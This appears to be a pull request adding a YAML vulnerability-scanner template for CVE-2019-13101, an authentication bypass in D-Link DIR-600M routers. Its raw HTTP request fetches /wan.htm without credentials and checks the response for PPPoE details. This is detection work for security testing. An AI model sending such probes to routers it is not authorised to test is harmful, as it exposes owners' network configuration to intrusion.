### PR TITLE
D-Link DIR-600M Router - Authentication Bypass

### DIFF
--- a/cves/2019/CVE-2019-13101.yaml
+++ b/cves/2019/CVE-2019-13101.yaml
@@ -5,7 +5,7 @@ info:
   name: D-Link DIR-600M - Authentication Bypass
   description: This module attempts to find D-Link router DIR-600M which is vulnerable to Incorrect Access Control. The vulnerability exists inwan.htm,wlan_basic.htm etc. which is accessible without authentication.This module has been tested successfully on Firmware Version 3.01,3.02,3.03,3.04,3.05,3.06.
   severity: critical
-  tags: cve-2019-13101,d-link,dir-600m,authentication-bypass,router
+  tags: cve-2019-13101,d-link,dir-600m,authentication-bypass,router,iot
 
 requests:
   - raw:

--- a/cves/2019/CVE-2019-13101.yaml
+++ b/cves/2019/CVE-2019-13101.yaml
@@ -3,20 +3,30 @@ id: CVE-2019-13101
 info:
   author: Suman_Kar
   name: D-Link DIR-600M - Authentication Bypass
-  description: This module attempts to find D-Link router DIR-600M which is vulnerable to Incorrect Access Control. The vulnerability exists inwan.htm,wlan_basic.htm etc. which is accessible without authentication.This module has been tested successfully on Firmware Version 3.01,3.02,3.03,3.04,3.05,3.06.
+  description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page.
   severity: critical
-  tags: cve-2019-13101,d-link,dir-600m,authentication-bypass,router,iot
+  tags: cve,cve2019,dlink,router,iot
+  referecne: |
+      - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
+      - https://github.com/d0x0/D-Link-DIR-600M
+      - https://www.exploit-db.com/exploits/47250
 
 requests:
   - raw:
       - |
-        GET /wlan_basic.htm HTTP/1.1
+        GET /wan.htm HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
         Connection: close
         User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
+    matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
+      - type: word
+        words:
+          - "/PPPoE/"
+        part: body

--- a/cves/2019/CVE-2019-13101.yaml
+++ b/cves/2019/CVE-2019-13101.yaml
@@ -1,0 +1,22 @@
+id: CVE-2019-13101
+
+info:
+  author: Suman_Kar
+  name: D-Link DIR-600M - Authentication Bypass
+  description: This module attempts to find D-Link router DIR-600M which is vulnerable to Incorrect Access Control. The vulnerability exists inwan.htm,wlan_basic.htm etc. which is accessible without authentication.This module has been tested successfully on Firmware Version 3.01,3.02,3.03,3.04,3.05,3.06.
+  severity: critical
+  tags: cve-2019-13101,d-link,dir-600m,authentication-bypass,router
+
+requests:
+  - raw:
+      - |
+        GET /wlan_basic.htm HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+
+    matchers:
+      - type: status
+        status:
+          - 200

--- a/cves/2019/CVE-2019-13101.yaml
+++ b/cves/2019/CVE-2019-13101.yaml
@@ -6,7 +6,7 @@ info:
   description: An issue was discovered on D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices. wan.htm can be accessed directly without authentication, which can lead to disclosure of information about the WAN, and can also be leveraged by an attacker to modify the data fields of the page.
   severity: critical
   tags: cve,cve2019,dlink,router,iot
-  referecne: |
+  reference: |
       - https://nvd.nist.gov/vuln/detail/CVE-2019-13101
       - https://github.com/d0x0/D-Link-DIR-600M
       - https://www.exploit-db.com/exploits/47250


### PR DESCRIPTION
This module attempts to find D-Link router DIR-600M which is vulnerable to Incorrect Access Control. The vulnerability exists inwan.htm,wlan_basic.htm etc. which is accessible without authentication. This module has been tested successfully on Firmware Version 3.01,3.02,3.03,3.04,3.05,3.06.
CVE-2019-13101
![Capture](https://user-images.githubusercontent.com/43452298/124337956-f249e700-dbc2-11eb-9071-c3ca824aecd7.PNG)
